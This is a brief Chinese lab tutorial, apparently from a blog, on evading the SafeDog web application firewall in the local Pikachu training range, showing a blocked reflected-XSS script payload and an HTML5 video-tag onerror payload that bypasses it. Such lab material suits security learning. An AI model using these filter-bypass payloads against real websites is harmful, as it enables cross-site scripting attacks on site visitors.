环境准备:
- 43-5 waf绕过 - 安全狗简介及安装-CSDN博客
- 然后安装pikachu靶场:构建完善的安全渗透测试环境:推荐工具、资源和下载链接_渗透测试靶机下载-CSDN博客
打开pikachu靶场
http://127.0.0.1/pikachu-master/vul/xss/xss_reflected_get.php使用常见payload被安全狗拦截
<script>alert("@@")</script>
绕过
1)HTME5新标签<video>绕过:
绕过payload:
<video src=1 onerror=alert(/渣渣辉/)>
